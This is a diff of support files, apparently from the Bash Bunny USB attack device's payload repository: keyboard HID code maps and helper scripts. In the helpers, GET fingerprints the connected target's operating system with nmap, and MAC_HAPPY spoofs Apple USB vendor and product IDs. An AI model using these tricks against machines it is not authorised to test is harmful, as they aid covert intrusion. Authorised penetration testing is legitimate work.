"]":"02,00,31",
|
||||
"Ñ":"02,00,33",
|
||||
"[":"02,00,34",
|
||||
"°":"02,00,35",
|
||||
";":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
">":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"\\":"05,00,2d",
|
||||
"~":"05,00,30",
|
||||
"`":"05,00,31",
|
||||
"^":"05,00,34",
|
||||
"¬":"05,00,35",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT":"12,00,00",
|
||||
"@":"40,00,14"
|
||||
}
|
||||
169
languages/sk.json
Normal file
169
languages/sk.json
Normal file
@@ -0,0 +1,169 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":" Slovak QWERTZ version made by Andrej Šimko",
|
||||
"__comment":" Note that some special characters use leftCtrl+leftAlt+[key]",
|
||||
"__comment":" Special Slovak characters like ľščťžýáíéúäô are not included",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"z":"00,00,1c",
|
||||
"y":"00,00,1d",
|
||||
"+":"00,00,1e",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"=":"00,00,2d",
|
||||
";":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Z":"02,00,1c",
|
||||
"Y":"02,00,1d",
|
||||
"1":"02,00,1e",
|
||||
"2":"02,00,1f",
|
||||
"3":"02,00,20",
|
||||
"4":"02,00,21",
|
||||
"5":"02,00,22",
|
||||
"6":"02,00,23",
|
||||
"7":"02,00,24",
|
||||
"8":"02,00,25",
|
||||
"9":"02,00,26",
|
||||
"0":"02,00,27",
|
||||
"\\":"05,00,14",
|
||||
"%":"02,00,2d",
|
||||
"/":"02,00,2f",
|
||||
"(":"02,00,30",
|
||||
"'":"05,00,13",
|
||||
")":"02,00,31",
|
||||
"\"":"02,00,33",
|
||||
"!":"02,00,34",
|
||||
"?":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
"|":"05,00,1a",
|
||||
"#":"05,00,1b",
|
||||
"&":"05,00,06",
|
||||
"@":"05,00,19",
|
||||
"$":"05,00,33",
|
||||
"*":"05,00,38",
|
||||
"{":"05,00,05",
|
||||
"}":"05,00,11",
|
||||
"[":"05,00,09",
|
||||
"]":"05,00,0a",
|
||||
"~":"05,00,1e",
|
||||
"^":"05,00,20",
|
||||
"<":"05,00,36",
|
||||
">":"05,00,37",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
@@ -1,169 +1,173 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"0":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"-":"00,00,2d",
|
||||
"=":"00,00,2e",
|
||||
"[":"00,00,2f",
|
||||
"]":"00,00,30",
|
||||
"\\":"00,00,31",
|
||||
";":"00,00,33",
|
||||
"'":"00,00,34",
|
||||
"`":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"/":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"@":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"^":"02,00,23",
|
||||
"&":"02,00,24",
|
||||
"*":"02,00,25",
|
||||
"(":"02,00,26",
|
||||
")":"02,00,27",
|
||||
"_":"02,00,2d",
|
||||
"+":"02,00,2e",
|
||||
"{":"02,00,2f",
|
||||
"}":"02,00,30",
|
||||
"|":"02,00,31",
|
||||
":":"02,00,33",
|
||||
"\"":"02,00,34",
|
||||
"~":"02,00,35",
|
||||
"<":"02,00,36",
|
||||
">":"02,00,37",
|
||||
"?":"02,00,38",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,0c",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"@": "02,00,1f",
|
||||
"3": "00,00,20",
|
||||
"#": "02,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "02,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"^": "02,00,23",
|
||||
"7": "00,00,24",
|
||||
"&": "02,00,24",
|
||||
"8": "00,00,25",
|
||||
"*": "02,00,25",
|
||||
"9": "00,00,26",
|
||||
"(": "02,00,26",
|
||||
"0": "00,00,27",
|
||||
")": "02,00,27",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2d",
|
||||
"_": "02,00,2d",
|
||||
"=": "00,00,2e",
|
||||
"+": "02,00,2e",
|
||||
"[": "00,00,2f",
|
||||
"{": "02,00,2f",
|
||||
"]": "00,00,30",
|
||||
"}": "02,00,30",
|
||||
"\\": "00,00,31",
|
||||
"|": "02,00,31",
|
||||
";": "00,00,33",
|
||||
":": "02,00,33",
|
||||
"'": "00,00,34",
|
||||
"\"": "02,00,34",
|
||||
"`": "00,00,35",
|
||||
"~": "02,00,35",
|
||||
",": "00,00,36",
|
||||
"<": "02,00,36",
|
||||
".": "00,00,37",
|
||||
">": "02,00,37",
|
||||
"/": "00,00,38",
|
||||
"?": "02,00,38",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
||||
|
||||
25
payloads/extensions/cucumber.sh
Executable file
25
payloads/extensions/cucumber.sh
Executable file
@@ -0,0 +1,25 @@
|
||||
#!/bin/bash
|
||||
|
||||
function CUCUMBER() {
|
||||
case $1 in
|
||||
"ENABLE")
|
||||
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
|
||||
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
|
||||
;;
|
||||
"DISABLE")
|
||||
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
|
||||
sleep 2
|
||||
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
|
||||
;;
|
||||
"PLAID")
|
||||
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
|
||||
sleep 2
|
||||
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
|
||||
;;
|
||||
*)
|
||||
LED FAIL
|
||||
exit 1
|
||||
esac
|
||||
}
|
||||
|
||||
export -f CUCUMBER
|
||||
27
payloads/extensions/debug.sh
Executable file
27
payloads/extensions/debug.sh
Executable file
@@ -0,0 +1,27 @@
|
||||
#!/bin/bash
|
||||
|
||||
################################################################################
|
||||
# Allow Debugging messages written to: "/root/udisk/debug/[session].txt"
|
||||
# on the BashBunny
|
||||
#
|
||||
# How this works?
|
||||
# 1) Example Command: DEBUG "switch-1-debug" "Hello from debug extension!"
|
||||
# 2) After bashing, text can be read at: "/root/udisk/debug/[session].txt"
|
||||
# on the BashBunny
|
||||
################################################################################
|
||||
|
||||
function DEBUG() {
|
||||
session=$1
|
||||
message=$2
|
||||
|
||||
timestamp () {
|
||||
echo "$(date +"%Y-%m-%d_%H-%M-%S")"
|
||||
}
|
||||
|
||||
mkdir -p /root/udisk/debug/
|
||||
debug_file="/root/udisk/debug/${session}.txt"
|
||||
[[ -f "${debug_file}" ]] || echo "$(timestamp): DEBUG STARTED" >> "${debug_file}"
|
||||
echo "$(timestamp): ${message}" >> ${debug_file}
|
||||
}
|
||||
|
||||
export -f DEBUG
|
||||
@@ -1,8 +1,8 @@
|
||||
#!/bin/bash
|
||||
|
||||
function DUCKY_LANG() {
|
||||
[[ -z "$1" ]] && exit 1 # parameter must be set
|
||||
[[ -z "$1" ]] && exit 1 # parameter must be set
|
||||
|
||||
export DUCKY_LANG="$1"
|
||||
export DUCKY_LANG="$1"
|
||||
}
|
||||
export -f DUCKY_LANG
|
||||
|
||||
@@ -1,23 +1,32 @@
|
||||
#!/bin/bash
|
||||
|
||||
function GET() {
|
||||
case $1 in
|
||||
"TARGET_IP")
|
||||
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
|
||||
;;
|
||||
"TARGET_HOSTNAME")
|
||||
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
|
||||
;;
|
||||
"HOST_IP")
|
||||
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
|
||||
;;
|
||||
"SWITCH_POSITION")
|
||||
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
|
||||
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
|
||||
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
|
||||
export SWITCH_POSITION="invalid"
|
||||
;;
|
||||
esac
|
||||
case $1 in
|
||||
"TARGET_IP")
|
||||
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
|
||||
;;
|
||||
"TARGET_HOSTNAME")
|
||||
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
|
||||
;;
|
||||
"HOST_IP")
|
||||
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
|
||||
;;
|
||||
"SWITCH_POSITION")
|
||||
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
|
||||
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
|
||||
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
|
||||
export SWITCH_POSITION="invalid"
|
||||
;;
|
||||
"TARGET_OS")
|
||||
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
|
||||
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1 -v2)
|
||||
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O $TARGET_IP --osscan-guess -v2)
|
||||
[[ "${ScanForOS,,}" == *"windows"* ]] && export TARGET_OS='WINDOWS' && return
|
||||
[[ "${ScanForOS,,}" == *"apple"* ]] && export TARGET_OS='MACOS' && return
|
||||
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
|
||||
export TARGET_OS='UNKNOWN'
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
export -f GET
|
||||
export -f GET
|
||||
|
||||
59
payloads/extensions/get2_dhclient.sh
Executable file
59
payloads/extensions/get2_dhclient.sh
Executable file
@@ -0,0 +1,59 @@
|
||||
#!/bin/bash
|
||||
|
||||
# get2_dhclient.sh - Bash Bunny extension to change from a DHCP server to a client.
|
||||
# This is needed when connected to macOS/OSX with Internet Sharing because
|
||||
# the host is the DHCP server and the Bash Bunny is the DHCP client.
|
||||
#
|
||||
# It also replaces the standard GET function so that TARGET_IP, TARGET_HOSTNAME
|
||||
# and HOST_IP work properly without having to modify the standard version. It
|
||||
# renames and uses the standard version for any other environment variables.
|
||||
#
|
||||
# Note that this must be sourced after get.sh so it is named "get2_dhclient.sh"
|
||||
# on the assumption that they are sourced in order by filename.
|
||||
#
|
||||
# This is free software released under the terms of the GPLv2+
|
||||
#
|
||||
# 20190321 raf <raf@raf.org>
|
||||
|
||||
function DHCLIENT() {
|
||||
|
||||
# Do nothing if GET isn't defined (get.sh hasn't been sourced yet)
|
||||
[ $(declare -f GET | /usr/bin/wc -l) = 0 ] && return
|
||||
|
||||
# Do nothing if we've already done it
|
||||
[ $(declare -f orig_GET | /usr/bin/wc -l) != 0 ] && return
|
||||
|
||||
# Stop the DHCP server if it is running
|
||||
/bin/systemctl status isc-dhcp-server && /bin/systemctl stop isc-dhcp-server
|
||||
|
||||
# Bring down the usb0 network interface
|
||||
/sbin/ifdown usb0
|
||||
|
||||
# Bring it up again as a DHCP client
|
||||
/sbin/dhclient usb0
|
||||
|
||||
# Rename the standard GET function before we replace it
|
||||
eval "$(echo "orig_GET()"; declare -f GET | tail -n +2)"
|
||||
export -f orig_GET
|
||||
|
||||
# Replace GET so that TARGET_IP, TARGET_HOSTNAME and HOST_IP work
|
||||
function GET() {
|
||||
case "$1" in
|
||||
"TARGET_IP")
|
||||
export TARGET_IP=$(awk '/option routers/ { tip = substr($3, 1, length($3)-1) } END { print tip }' /var/lib/dhcp/dhclient.leases)
|
||||
;;
|
||||
"TARGET_HOSTNAME")
|
||||
export TARGET_HOSTNAME=$(awk '/server-name/ { thn = substr($2, 2, length($2)-3) } END { print thn }' /var/lib/dhcp/dhclient.leases)
|
||||
;;
|
||||
"HOST_IP")
|
||||
export HOST_IP=$(awk '/fixed-address/ { hip = substr($2, 1, length($2)-1) } END { print hip }' /var/lib/dhcp/dhclient.leases)
|
||||
;;
|
||||
*)
|
||||
orig_GET "$1"
|
||||
;;
|
||||
esac
|
||||
}
|
||||
}
|
||||
|
||||
export -f DHCLIENT
|
||||
|
||||
29
payloads/extensions/mac_happy.sh
Executable file
29
payloads/extensions/mac_happy.sh
Executable file
@@ -0,0 +1,29 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Title: Mac_Happy
|
||||
# Author: thehappydinoa
|
||||
# Target: macOS
|
||||
# Version: 0.3
|
||||
#
|
||||
# Makes Mac happy by correctly setting pid and vid
|
||||
# Use by running MAC_HAPPY HID/ETHERNET/...
|
||||
#
|
||||
|
||||
function MAC_HAPPY() {
|
||||
[[ "$#" -gt 1 ]] || exit 1
|
||||
case "$1" in
|
||||
HID)
|
||||
ATTACKMODE HID vid_0x05ac pid_0x021e
|
||||
;;
|
||||
ETHERNET)
|
||||
ATTACKMODE ECM_ETHERNET vid_0x05ac pid_0x021e
|
||||
;;
|
||||
ATTACKMODE)
|
||||
eval "$@ vid_0x05ac pid_0x021e"
|
||||
;;
|
||||
*)
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
export -f MAC_HAPPY
|
||||
@@ -8,11 +8,11 @@
|
||||
# REQUIRETOOL impacket
|
||||
|
||||
function REQUIRETOOL() {
|
||||
[[ -z "$1" ]] && exit 1 # parameter must be set
|
||||
[[ -z "$1" ]] && exit 1 # parameter must be set
|
||||
|
||||
if [ ! -d /tools/$1/ ]; then
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
if [ ! -d /tools/$1/ ]; then
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
export -f REQUIRETOOL
|
||||
|
||||
@@ -13,9 +13,9 @@
|
||||
function RUN() {
|
||||
local os=$1
|
||||
shift
|
||||
|
||||
